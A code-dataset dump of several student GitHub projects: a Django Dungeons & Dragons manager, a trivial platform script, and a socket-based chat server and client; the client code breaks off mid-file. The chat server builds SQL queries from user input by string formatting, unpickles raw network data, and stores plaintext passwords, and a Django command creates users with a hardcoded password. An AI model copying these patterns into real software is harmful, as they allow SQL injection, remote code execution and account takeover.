"src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom .models import *\n\n# Test Constants\nDEFAULT_LEVEL = 0\nDEFAULT_XP = 0\nDEFAULT_HP = 6\n\nclass CharacterCreateTestCase(TestCase):\n\tdef setUp(self):\n\t\tCharacter.objects.create(characterName=\"Malikar\", alignment=\"Lawful Evil\", size=\"Medium\")\n\n\tdef test_character_id(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.characterID, 1)\n\n\tdef test_character_name(self):\n\t\ttry:\n\t\t\tCharacter.objects.get(characterName=\"Malikar\")\n\t\texcept:\n\t\t\tself.fail()\n\n\tdef test_character_level(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.level, DEFAULT_LEVEL)\n\n\tdef test_character_xp(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.xp, DEFAULT_XP)\n\n\tdef test_character_max_hp(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.maxHP, DEFAULT_HP)\n\n\tdef test_character_current_hp(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.currentHP, DEFAULT_HP)\n\n\tdef test_character_alignment(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.alignment, \"Lawful Evil\")\n\n\tdef test_character_size(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.size, \"Medium\")" }, { "alpha_fraction": 0.7310924530029297, "alphanum_fraction": 0.7310924530029297, "avg_line_length": 30, "blob_id": "e630bb030a53f1d8bdf73d79fa5eb40361c157dc", "content_id": "18789174693889e4ab7aa68bb2589d989da7753a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "no_license", "max_line_length": 82, "num_lines": 23, "path": "/Users/tests.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom .models import Profile\n\nclass ProfileCreationTestCase(TestCase):\n\n\tdef test_profile_created_upon_user_creation(self):\n\n\t\tUser.objects.create_user('TestCaseUser', email='[email protected]', password='testpassword')\n\t\tuser = User.objects.get(username='TestCaseUser')\n\t\ttry:\n\t\t\tProfile.objects.get(user = user)\n\t\texcept Profile.DoesNotExist as e:\n\t\t\tself.fail('Profile was not created when User was created:', e)\n\n\tdef test_each_user_has_a_profile(self):\n\n\t\tuser_list = User.objects.all()\n\t\tfor user in user_list:\n\t\t\ttry:\n\t\t\t\tProfile.objects.get(user = user)\n\t\t\texcept Profile.DoesNotExist as e:\n\t\t\t\tself.fail('User does not have a Profile:', e)\n\n" }, { "alpha_fraction": 0.6532156467437744, "alphanum_fraction": 0.6532156467437744, "avg_line_length": 25.14285659790039, "blob_id": "3142bc75aead75a16a55f4482398aeac55e7e870", "content_id": "ed63d120b227879889f627f480d79833d3ee85b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2379, "license_type": "no_license", "max_line_length": 78, "num_lines": 91, "path": "/Inventory/views.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.views.generic import (\n ListView, \n DetailView,\n CreateView,\n UpdateView,\n DeleteView\n)\n\nfrom django.http import HttpResponseRedirect\nfrom .models import *\nfrom .forms import CreateItemForm\n\n# Home view\ndef home(request):\n form = CreateItemForm(request.POST or None)\n\n if form.is_valid():\n form.save()\n\n context = {\n 'title' : 'Inventory',\n 'items' : Item.objects.all(),\n 'form' : form\n }\n\n return render(request, 'Inventory/item-home.html', context)\n\n# This is a class based view that uses django's built-in\n# ListView view to display the inventorys\n# It inherits from ListView\nclass ItemListView(ListView): \n model = Item\n # template_name = 'InventoryBuilder/Inventory_builder-home.html'\n context_object_name = 'items'\n\n\nclass ItemDetailView(DetailView):\n model = Item\n # context_object_name = 'inventorys'\n #context_object_name = 'items'\n\n\nclass ItemCreateView(LoginRequiredMixin, CreateView):\n model = Item\n fields = ['itemName']\n # exclude = []\n\n login_url = '/login/'\n\n # def __init__(self, *args, **kwargs):\n # form.instance.user = self.request.user\n\n def form_valid(self, form):\n # Updates the author of the current form to be the current user\n form.instance.user = self.request.user \n return super().form_valid(form)\n\n\nclass ItemEditView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n model = Item\n fields = ['itemName']\n # exclude = []\n\n login_url = '/login/'\n \n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n \n # Tests to ensure the logged-in user is the owner of that inventory...\n def test_func(self):\n Item = self.get_object()\n if self.request.user == Item.user:\n return True\n return False\n\n\nclass ItemDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n model = Item\n success_url = '/inventory/inventory'\n login_url = '/login/'\n fail_url = '/login/' #Works?\n\n def test_func(self):\n Item = self.get_object()\n if self.request.user == Item.user:\n return True\n return False\n" }, { "alpha_fraction": 0.6688417792320251, "alphanum_fraction": 0.6802610158920288, "avg_line_length": 24.58333396911621, "blob_id": "2e6a925a0c63d1b5b988e43ba408fb6b859847d2", "content_id": "5df2aa5098b2155f7316092994534c9caee9866d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "no_license", "max_line_length": 63, "num_lines": 24, "path": "/Character_Builder/management/commands/populate_user_db.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User\n\n# Populates the user base with 2 simple default users\nclass Command(BaseCommand):\n # args = '<foo bar ...>'\n help = 'Populate the user base with two simple default users'\n\n def _create_users(self):\n defaultuser1 = User.objects.create_user(\n 'defaultuser1',\n password='djangoproject'\n )\n defaultuser1.save()\n\n defaultuser2 = User.objects.create_user(\n 'defaultuser2',\n password='djangoproject'\n )\n defaultuser2.save()\n\n\n def handle(self, *args, **options):\n self._create_users()" }, { "alpha_fraction": 0.6553308963775635, "alphanum_fraction": 0.6553308963775635, "avg_line_length": 27.605262756347656, "blob_id": "ff1123bdd854d83ae1bad01552dd907d29a27872", "content_id": "4bafadf7c40970e45a01a0971e1a3c5a1017d1a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1088, "license_type": "no_license", "max_line_length": 70, "num_lines": 38, "path": "/Character_Builder/urls.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom .views import (\n CharacterListView,\n CharacterDetailView,\n CharacterCreateView,\n CharacterEditView,\n CharacterDeleteView,\n\n CharacterRaceListView,\n CharacterClassListView,\n)\nfrom . import views\n\nurlpatterns = [\n path('', \n views.home, name='character_builder-home'),\n # path('', PostListView.as_view(), name='character_builder-home'),\n path('characters/', \n CharacterListView.as_view(), name='character-list'),\n\n path('characters/create/', \n CharacterCreateView.as_view(), name='character-create'),\n\n path('characters/<int:pk>/', \n CharacterDetailView.as_view(), name='character-detail'),\n\n path('characters/<int:pk>/edit', \n CharacterEditView.as_view(), name='character-edit'),\n\n path('characters/<int:pk>/delete', \n CharacterDeleteView.as_view(), name='character-delete'),\n \n path('races/', \n CharacterRaceListView.as_view(), name='characterRace-list'),\n\n path('classes/', \n CharacterClassListView.as_view(), name='characterClass-list'),\n]\n\n" }, { "alpha_fraction": 0.7870370149612427, "alphanum_fraction": 0.7870370149612427, "avg_line_length": 20.600000381469727, "blob_id": "1c1b14e39a7b92d9556c0268211eca6ae732990f", "content_id": "e180da472afa34ac756c665c988dacc5dcc83e11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 108, "license_type": "no_license", "max_line_length": 40, "num_lines": 5, "path": "/Character_Builder/apps.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass CharacterBuilderConfig(AppConfig):\n name = 'Character_Builder'\n" }, { "alpha_fraction": 0.7859452962875366, "alphanum_fraction": 0.8018230199813843, "avg_line_length": 38.546512603759766, "blob_id": "9dae894e947c528dc8c8f462f19edd6aed7057b2", "content_id": "a64180bc13058d427ba9e8d1cfde081b0ca2d984", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3401, "license_type": "no_license", "max_line_length": 211, "num_lines": 86, "path": "/Architecture.md", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# Program Organization\n\n[Diagram](https://docs.google.com/drawings/d/1TUbR1T9_B6WfCYGCicQKSH8qjjn9X43obXvX7nI2Zt0/edit?usp=sharing)\n\n[In-Depth Description](https://docs.google.com/document/d/1FA4I41uiwIgKB1tqMOyXJnYcXf9lOJA9ilg85u-RlCQ/edit?usp=sharing)\n\n# Major Classes\n\n[Diagram](https://drive.google.com/file/d/1NqDpVnVrYHD-SCcfD8B3sug9F6vCOEDB/view?usp=sharing)\n\n[Class Descriptions](https://docs.google.com/document/d/1n7qOdXY2i-A0tg3gyodm_GhEKr2NwJpASYI_jcA4ivU/edit?usp=sharing)\n\n# Data Design\n\n[Database Schemas](https://docs.google.com/document/d/1E3cikrkHcXE-PxppXv7h1ovNXgMTyPIy-kNyr7d9zvQ/edit?usp=sharing)\n\n# Business Rules\n\nThe software needs to follow the rules of DnD to allow users to create characters and perform actions that are relevant to the DnD universe.\n\n# User Interface Design\n\n[Diagram](https://drive.google.com/file/d/1WVBX7nz-pJ9zIM4E0k-gchcGm-XRzGoa/view?usp=sharing)\n\n[User Stories](https://docs.google.com/document/d/1NZeqT6CyVsro24gmO0C-WLZbVaCbVZdCNq2G_n58w24/edit?usp=sharing)\n\n# Resource Management\n\nResource Management is not a concern of this project as we are working with simple operations on a database instead of complex algorithms with expensive computation costs.\n\n# Security\n\nSecurity for this project will be handled by django and the use of user profiles requiring a username and password. Accessing an account and the characters/campaigns contained within will require authentication.\n\n# Performance\n\nPerformance is not a concern of this project.\n\n# Scalability\n\nBecause we are creating a web page style project, if we need to add things in the future to expand on the system we can easily add new pages and features that can acheive this.\n\n# Interoperability\n\nInteroperability will be handled by django as it standardizes the ways in which things are done, making information exchange easy.\n\n# Internationalization/Localization\n\nInternationalization and Localization are not a concern for this project. It will designed like it is being pushed to American markets.\n\n# Input/Output\n\n# Error Processing\n\nError processing for this project will be done by sending error messages and will be handled by Django.\n\n# Fault Tolerance\n\nTolerance for faults will be minimal. If a field is incorrect or void, we will simply reject the field and require the user fill it in properly before allowing them to continue.\n\n# Architectural Feasibility\n\nThe architecture is feasible for what we are trying to accomplish as we simply need an interface for a database to hold the user's data.\n\n# Overengineering\n\nAs mentioned in error processing and fault tolerance, we will not be allowing errors to be passed through the system. Therefore, the system will lean heavily towards doing the simplest thing possible.\n\n# Build-vs-Buy Decisions\n\nThird Party Systems\n\n * Crispy Forms - Renders forms for easier readability of forms\n \n * Bootstrap 4 - This allows us to easily create attractive HTML for the site without having to manually write all HTML\n \n * Pillow - Image handling library\n \n\n# Reuse\n\nWe are using Bootstrap and Django to create a lot of what we are working on, but we are creating the code and other components from the ground up. Thus, this is not a concern for the project.\n\n# Change Strategy\n\nTo handle changes to the system, we will meet with the team, expand the application, and implement the new features using a test-driven delevopment approach.\n" }, { "alpha_fraction": 0.6518151760101318, "alphanum_fraction": 0.6831682920455933, "avg_line_length": 29.299999237060547, "blob_id": "2d6fd3508b7b8189e84fa4ac6856389c78868e3c", "content_id": "57417216ad9c941bf66592762c1aecb9bb745528", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 606, "license_type": "no_license", "max_line_length": 190, "num_lines": 20, "path": "/Character_Builder/migrations/0003_character_characterclass.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.7 on 2019-04-08 02:09\n\nimport Character_Builder.models\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Character_Builder', '0002_character_race'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='character',\n name='characterClass',\n field=models.ForeignKey(blank=True, default=Character_Builder.models.defaultClass, null=True, on_delete=django.db.models.deletion.PROTECT, to='Character_Builder.CharacterClass'),\n ),\n ]\n" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7222222089767456, "avg_line_length": 9.428571701049805, "blob_id": "86fa70b19d185c9b901059c0893990758edc1d47", "content_id": "02413fe4feb41edd294fe2f7d2cb721edf4c2647", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 72, "license_type": "no_license", "max_line_length": 35, "num_lines": 7, "path": "/Character_Builder/createRaces.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "import os\n\n\n\nos.system(\"python manage.py shell\")\n\n# Unneded attempt. lol" } ]
32
GRAYH3ART/PythonTestGitProject
https://github.com/GRAYH3ART/PythonTestGitProject
4bcaac27fa0fde3530691b17800549435a7d4649
db627895c9cbf7fc29ea2c3c1c82e45f41367ea9
d95d35ea8e8793fa6404210320cdf3edf2474784
refs/heads/master
2022-07-02T17:04:57.668788
2020-05-15T11:08:42
2020-05-15T11:08:42
264,171,861
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7765362858772278, "alphanum_fraction": 0.7765362858772278, "avg_line_length": 18.88888931274414, "blob_id": "67f7800d329b5ef8c93aafc34769a163eb7188c3", "content_id": "b3bcf4607236b6d65fce60f34ec62332dfa29c03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 30, "num_lines": 9, "path": "/start.py", "repo_name": "GRAYH3ART/PythonTestGitProject", "src_encoding": "UTF-8", "text": "import platform\n\nprint ('PythonTestGitProject')\n\nprint(platform.system())\nprint(platform.system())\nprint(platform.machine())\nprint(platform.version())\nprint(platform.processor())\n" } ]
1
shakkedstux/cyber_final_project
https://github.com/shakkedstux/cyber_final_project
032b37d815102090e0f92e9e205f5d3e84d2559d
02d9afa4bb52c408f0676391b6f549aa6932572a
814c305259ab410c84ec352ea0326adfc02536a3
refs/heads/master
2022-09-10T02:07:11.918091
2020-05-22T17:55:58
2020-05-22T17:55:58
266,175,511
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6113763451576233, "alphanum_fraction": 0.6218385100364685, "avg_line_length": 28.130178451538086, "blob_id": "df7a755ad094c08a781c71715373bd5a6933f98f", "content_id": "891982a048ec4214a4ab177416d4aa69edba4938", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9845, "license_type": "no_license", "max_line_length": 179, "num_lines": 338, "path": "/server.py", "repo_name": "shakkedstux/cyber_final_project", "src_encoding": "UTF-8", "text": "# CYBER PROJECT - SERVER ( VERSION 1.0 ) BY SHAKKED STUX\n\n\nimport socket\nimport select\nimport time\nimport pickle\nimport sqlite3\nfrom datetime import datetime\n\n\ndef get_user_out(username):\n\n global sockets\n\n socket = username_socket(username)\n\n log_out(username)\n\n massageType = \"8\"\n send(socket, [massageType])\n\n\ndef send_new_member(socket, username, group):\n\n massageType = \"7\"\n massage = [massageType, username, group]\n\n send(socket, massage)\n\n\ndef send_new_member_to_all(groupname, username):\n\n global conn, usernames\n\n members = conn.execute(\"SELECT username FROM groups WHERE type = 'g' and contact = '{}'\".format(groupname)).fetchall() # (usernames)\n\n for member in members:\n if member[0] in usernames: # members looks like - [('a',),('b',),('c',)..]\n send_new_member(username_socket(member[0]), username, groupname)\n\n\ndef go_to_massages(username, group):\n\n global conn\n\n x = conn.execute(\"SELECT type FROM groups WHERE contact = '{}' and username = '{}'\".format(group, username)).fetchall()\n if x[0][0] == \"c\": # group is private\n return private_massages(username, group)\n return massages(group)\n\n\ndef contact_user(username, contact):\n\n global conn\n\n x = conn.execute(\"SELECT COUNT(1) FROM groups WHERE type = 'g' and contact = '{}'\".format(contact)).fetchall()\n if x[0][0] == 0: # if connection wasn't made yet\n conn.execute(\"INSERT INTO groups (type, contact, username) VALUES ('c', '{}', '{}')\".format(contact, username))\n conn.commit()\n\n return private_massages(username, contact)\n\n massageType = \"5\"\n return ([massageType, \"Please choose different user.\"])\n\n\ndef create_group(username, groupname):\n\n global conn\n\n y = conn.execute(\"SELECT COUNT(1) FROM groups WHERE contact = '{}'\".format(groupname)).fetchall() # not even letting you take a name that someone contacted , but not exists\n x = conn.execute(\"SELECT COUNT(1) FROM users WHERE username = '{}'\".format(groupname)).fetchall()\n if y[0][0] + x[0][0] == 0: # if group not exist\n conn.execute(\"INSERT INTO groups (type, contact, username) VALUES ('g', '{}', '{}')\".format(groupname, username))\n conn.commit()\n\n return massages(groupname)\n\n massageType = \"5\"\n return ([massageType, \"Please choose different name.\"])\n\n\ndef quit_group_page(username, groupname):\n\n # inserting time to groups table where username = {} and groupname = {}\n # for now - works exactly like groups()\n\n return groups(username)\n\n\ndef log_out(username):\n\n global usernames\n index = usernames.index(username)\n usernames[index] = \"\"\n\n\ndef send_massage(socket, massageInfo):\n\n massageType = \"6\"\n massage = [massageType, massageInfo]\n\n send(socket, massage)\n\n\ndef send_massage_to_all(massageInfo):\n\n global conn, usernames\n\n groupname = massageInfo[2]\n members = conn.execute(\"SELECT username FROM groups WHERE contact = '{}'\".format(groupname)).fetchall() # (usernames)\n\n for member in members:\n if member[0] in usernames: # members looks like - [('a',),('b',),('c',)..]\n send_massage(username_socket(member[0]), massageInfo)\n\n\ndef private_massages(username1, username2):\n\n global conn\n\n massages = conn.execute('''SELECT * FROM massages WHERE sendto = '{}' AND sender = '{}' OR\n sendto = '{}' AND sender = \"{}\" ORDER BY time'''.format(username1, username2, username2, username1)).fetchall()\n\n massageType = \"4\"\n return [massageType, username2, massages]\n\n\ndef new_massage(username, sendto, private, msg):\n\n global conn\n now = datetime.now()\n formattedNow = now.strftime('%Y-%m-%d %H:%M:%S')\n massageInfo = [username, private, sendto, formattedNow, msg] # sendto - groupname (or username)\n\n conn.execute('''INSERT INTO massages (sender, private, sendto, time, text)\n VALUES ('{}', '{}', '{}', '{}', '{}')'''.format(*massageInfo))\n conn.commit()\n\n if private == \"p\":\n send_massage(username_socket(username), massageInfo)\n if sendto in usernames:\n send_massage(username_socket(sendto), massageInfo)\n\n else:\n send_massage_to_all(massageInfo)\n\n\ndef massages(groupname): # returns massages and members in group , and also groupname\n\n global conn\n massages = conn.execute(\"SELECT * FROM massages WHERE sendto = '{}' ORDER BY time\".format(groupname)).fetchall()\n members = conn.execute(\"SELECT username FROM groups WHERE contact = '{}'\".format(groupname)).fetchall()\n for i in range(len(members)):\n members[i] = members[i][0]\n\n massageType = \"2\"\n\n return [massageType, groupname, massages, members]\n\n\ndef join_group(username, groupname):\n\n global conn\n\n y = conn.execute(\"SELECT COUNT(1) FROM groups WHERE type = 'g' and contact = '{}'\".format(groupname)).fetchall()\n if y[0][0] != 0: # if there is a group\n x = conn.execute(\"SELECT COUNT(1) FROM groups WHERE type = 'g' and contact = '{}' AND username = '{}'\".format(groupname, username)).fetchall()\n if x[0][0] == 0: # if he is not in it\n\n send_new_member_to_all(groupname, username)\n conn.execute(\"INSERT INTO groups (type, contact, username) VALUES ('g', '{}', '{}')\".format(groupname, username))\n conn.commit()\n\n return massages(groupname)\n\n massageType = \"5\"\n return ([massageType, \"No such group.\"])\n\n\ndef groups(username):\n\n global conn\n\n groupnames = conn.execute(\"SELECT contact FROM groups WHERE username = '{}'\".format(username)).fetchall()\n\n massageType = \"1\"\n return [massageType, groupnames]\n\n\ndef login(username, password, socket):\n\n global conn, usernames, sockets\n x = conn.execute(\"SELECT COUNT(1) FROM users WHERE username = '{}' AND password = '{}'\".format(username, password)).fetchall()\n\n if x[0][0] == 1:\n if username in usernames: # the user is already connected (ideally from another device)\n get_user_out(username)\n\n usernames[sockets.index(socket)] = username\n\n return groups(username)\n\n return [\"0\"]\n\n\ndef create_user(username, password, socket):\n\n global conn, usernames, sockets\n x = conn.execute(\"SELECT COUNT(1) FROM users WHERE username = '{}'\".format(username)).fetchall()\n y = conn.execute(\"SELECT COUNT(1) FROM groups WHERE contact = '{}' and type = 'g'\".format(username)).fetchall() # letting you take the name also if someone contacted this name\n\n if x[0][0] + y[0][0] >= 1:\n return [\"3\"]\n\n conn.execute(\"INSERT INTO users (username, password) VALUES ('{}', '{}')\".format(username, password))\n conn.commit()\n\n usernames[sockets.index(socket)] = username\n\n massageType = \"1\"\n return [massageType, []] # [] - groups\n\n\ndef username_socket(x):\n\n if type(x) == str: # x is username\n return sockets[usernames.index(x)]\n\n return usernames[sockets.index(x)]\n\n\ndef send(socket, massage):\n\n massage = pickle.dumps(massage)\n if type(socket) == str: # clientSocket represent username, find the socket.\n socket = username_socket(socket)\n\n socket.send(massage)\n\n\ndef massage(words, socket):\n\n massageType = words[0]\n username = username_socket(socket)\n\n if massageType == \"0\": # client create user\n send(socket, create_user(words[1], words[2], socket))\n\n if massageType == \"1\": # client log in\n send(socket, login(words[1], words[2], socket))\n\n\n if massageType == \"2\": # client join group (2,7,8)\n send(socket, join_group(username, words[1]))\n\n\n if massageType == \"3\": # client need groups table\n send(socket, groups(username))\n\n if massageType == \"4\": # client send massage\n new_massage(username, words[1], words[2], words[3])\n\n if massageType == \"5\": # client logs out\n log_out(username)\n\n if massageType == \"6\": # client quits group(chat) page - For now SAME as \"3\"\n send(socket, quit_group_page(username, words[1]))\n\n if massageType == \"7\": # client contact user\n send(socket, contact_user(username, words[1]))\n\n if massageType == \"8\": # client creates group\n send(socket, create_group(username, words[1]))\n\n if massageType == \"9\": # client creates group\n send(socket, go_to_massages(username, words[1]))\n\n\ndef listen():\n\n serverSocket = socket.socket()\n port = 7784\n serverSocket.bind((\"0.0.0.0\",port))\n serverSocket.listen(10)\n\n global sockets, usernames\n sockets = []\n usernames = []\n size = 512\n while True:\n rlist, wlist, xlist = select.select([serverSocket] + sockets, sockets, [])\n\n for userSocket in rlist:\n\n if userSocket is serverSocket: # new user connected\n (new_socket, address) = serverSocket.accept()\n sockets.append(new_socket)\n usernames.append(\"\")\n\n else:\n try:\n msg = b''\n while True:\n x = userSocket.recv(size)\n msg = msg + x\n if len(x) < size:\n break\n words = pickle.loads(msg)\n massage(words, userSocket)\n except: # user exited\n index = sockets.index(userSocket)\n sockets.pop(index)\n usernames.pop(index)\n\n break_length = 0.2\n time.sleep(break_length)\n\n\ndef create_DB():\n\n global conn\n conn = sqlite3.connect('database.db')\n conn.execute(\"CREATE TABLE IF NOT EXISTS users (username text, password text);\")\n conn.execute(\"CREATE TABLE IF NOT EXISTS groups (type text, contact text, username text);\")\n conn.execute('''CREATE TABLE IF NOT EXISTS massages\n (sender text, private text, sendto text, time time, text text);''')\n\n\ndef main():\n\n create_DB() # if not exist\n listen()\n\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6302350163459778, "alphanum_fraction": 0.6415444612503052, "avg_line_length": 27.086849212646484, "blob_id": "c4ae39a5218a1d4363d2093005bd67b9ede0a6ff", "content_id": "0cbbc4ac78f51c16c1a69a087da97f7585714af4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11318, "license_type": "no_license", "max_line_length": 185, "num_lines": 403, "path": "/client.py", "repo_name": "shakkedstux/cyber_final_project", "src_encoding": "UTF-8", "text": "# CYBER PROJECT - CLIENT ( VERSION 1.0 ) BY SHAKKED STUX\n\n\nfrom tkinter import *\nimport pickle\nimport socket\nimport select\nimport time\n\n\ndef new_member(member, groupname):\n\n global group, membersList\n\n try: # global may not exist, and mambersList.insert could not exist\n # So - what it is , is : if you are in a group page and same group (all of this same in new_massage)\n if group == groupname:\n membersList.insert(END, \", \"+member)\n except:\n pass\n\n\ndef create_group(groupname):\n\n if groupname == \"\":\n create_join_group_page(\"Field is empty.\")\n else:\n massageType = \"8\"\n send([massageType, groupname])\n\n\ndef contact_user(username):\n\n if username == \"\":\n create_join_group_page(\"Field is empty.\")\n else:\n massageType = \"7\"\n send([massageType, username])\n\n\ndef quit_group_page(groupname):\n\n massageType = \"6\"\n send([massageType, groupname])\n\n\ndef log_out():\n\n massageType = \"5\"\n send([massageType])\n\n create_login_page(\"Fill the form to get in again.\")\n\n\ndef new_massage(massageInfo):\n\n global group, massagesList\n groupname = massageInfo[2]\n sender = massageInfo[0]\n\n try:\n if group == groupname or group == sender:\n massagesList.config(state=\"normal\")\n massagesList.insert(END, massageInfo[0] + \": \" + massageInfo[4])\n massagesList.insert(END, massageInfo[3].split()[1] + \"\\n \\n\")\n massagesList.see(END)\n massagesList.config(state=\"disabled\")\n except:\n pass\n\n\ndef click(evt):\n try:\n w = evt.widget\n index = int(w.curselection()[0])\n value = w.get(index)\n print(value)\n massageType = \"9\"\n send([massageType, value])\n except:\n pass\n\n\ndef create_private_group_page(username, massages):\n\n global frame, group\n group = username\n frame.destroy()\n\n frame = Frame(window, height=300, width=400) # create new page\n frame.pack_propagate(0)\n frame.pack()\n\n top_widgets_frame = Frame(frame, height=50)\n top_widgets_frame.pack_propagate(0)\n Button(top_widgets_frame, text=\"Back\", command = lambda: quit_group_page(username)).pack(side=\"right\", fill=Y)\n Label(top_widgets_frame, text=\" \"+username+\" \").pack(side=\"left\", fill=Y)\n top_widgets_frame.pack(fill=X)\n\n scrollbarFrame = Frame(frame)\n scrollbar = Scrollbar(scrollbarFrame)\n scrollbar.pack(side=\"right\", fill=Y)\n\n global massagesList\n massagesList = Text(scrollbarFrame, yscrollcommand = scrollbar.set, cursor=\"arrow\")\n\n\n for massage in massages:\n massagesList.insert(END, massage[0] + \": \" + massage[4])\n massagesList.insert(END, massage[3].split()[1] + \"\\n \\n\")\n\n massagesList.config(state=\"disabled\")\n massagesList.pack(fill=X)\n scrollbar.config(command = massagesList.yview)\n\n massagesList.see(END)\n\n send_massage_frame = Frame(frame, height=\"50\")\n send_massage_frame.pack_propagate(0)\n Button(send_massage_frame, text=\"Send\", command = lambda: [send_massage(username, \"p\", massageEntry.get(\"1.0\",END)), massageEntry.delete('1.0', END)]).pack(fill=BOTH, side=\"right\")\n massageEntry = Text(send_massage_frame, width=\"50\")\n massageEntry.pack(fill=Y, side=\"left\")\n send_massage_frame.pack(fill=X, side=\"bottom\")\n\n scrollbarFrame.pack(fill=BOTH)\n\n\ndef send_massage(groupname, private, msg):\n\n massageType = \"4\"\n send([massageType, groupname, private, msg])\n\n\ndef create_group_page(groupname, massages, members):\n\n global frame, group\n group = groupname\n frame.destroy()\n\n frame = Frame(window, height=300, width=400) # create new page\n frame.pack_propagate(0)\n frame.pack()\n\n top_widgets_frame = Frame(frame, height=50)\n top_widgets_frame.pack_propagate(0)\n\n Button(top_widgets_frame, text=\"Back\", command = lambda: quit_group_page(groupname)).pack(side=\"right\", fill=Y)\n\n Label(top_widgets_frame, text=\" \"+groupname+\" \").pack(side=\"left\", fill=Y)\n\n membersScrollbarFrame = Frame(top_widgets_frame)\n scrollbar = Scrollbar(membersScrollbarFrame, orient='horizontal')\n scrollbar.pack(side=\"top\", fill=X)\n\n global membersList\n membersList = Text(membersScrollbarFrame, xscrollcommand = scrollbar.set, cursor=\"arrow\", relief='flat', padx=5)\n membersList.configure(background='SystemButtonFace')\n\n membersList.config(wrap='none')\n membersList.insert(END, \", \".join(members))\n\n membersList.pack(fill=BOTH)\n scrollbar.config(command = membersList.xview)\n\n membersScrollbarFrame.pack(side=\"left\", fill=BOTH)\n top_widgets_frame.pack(fill=X)\n\n\n scrollbarFrame = Frame(frame)\n scrollbar = Scrollbar(scrollbarFrame)\n scrollbar.pack(side=\"right\", fill=Y)\n\n global massagesList\n massagesList = Text(scrollbarFrame, yscrollcommand = scrollbar.set, cursor=\"arrow\")\n\n for massage in massages:\n massagesList.insert(END, massage[0] + \": \" + massage[4])\n massagesList.insert(END, massage[3].split()[1] + \"\\n \\n\")\n\n massagesList.config(state=\"disabled\")\n massagesList.pack(fill=X)\n scrollbar.config(command = massagesList.yview)\n\n massagesList.see(END)\n\n send_massage_frame = Frame(frame, height=50)\n send_massage_frame.pack_propagate(0)\n Button(send_massage_frame, text=\"Send\", command = lambda: [send_massage(groupname, \"g\", massageEntry.get(\"1.0\",END)), massageEntry.delete('1.0', END)]).pack(fill=BOTH, side=\"right\")\n massageEntry = Text(send_massage_frame, width=50)\n massageEntry.pack(fill=Y, side=\"left\")\n send_massage_frame.pack(fill=X, side=\"bottom\")\n\n scrollbarFrame.pack(fill=BOTH)\n\n\ndef i_need_groups():\n\n massageType = \"3\"\n send([massageType])\n\n\ndef join_group(groupname):\n\n if groupname == \"\":\n create_join_group_page(\"Field is empty.\")\n else:\n massageType = \"2\"\n send([massageType, groupname])\n\n\ndef create_join_group_page(msg):\n\n global frame\n frame.destroy()\n\n frame = Frame(window, height=300, width=400) # create new page\n frame.pack_propagate(0)\n frame.pack()\n\n button_frame = Frame(frame)\n Button(button_frame, text=\"Back\", command = lambda: i_need_groups()).pack(side=\"left\")\n button_frame.pack(fill=X)\n\n Label(frame, text=msg).pack()\n\n groupnameEntry = Entry(frame)\n groupnameEntry.pack()\n\n Button(frame, text=\"Contact user\", command = lambda: contact_user(groupnameEntry.get())).pack()\n Button(frame, text=\"Join existing group\", command = lambda: join_group(groupnameEntry.get())).pack()\n Button(frame, text=\"Create new group\", command = lambda: create_group(groupnameEntry.get())).pack()\n\n\ndef create_groups_page(groups):\n\n global frame\n frame.destroy()\n\n frame = Frame(window, height=300, width=400) # create new page\n frame.pack_propagate(0)\n\n buttons_frame = Frame(frame)\n Button(buttons_frame, 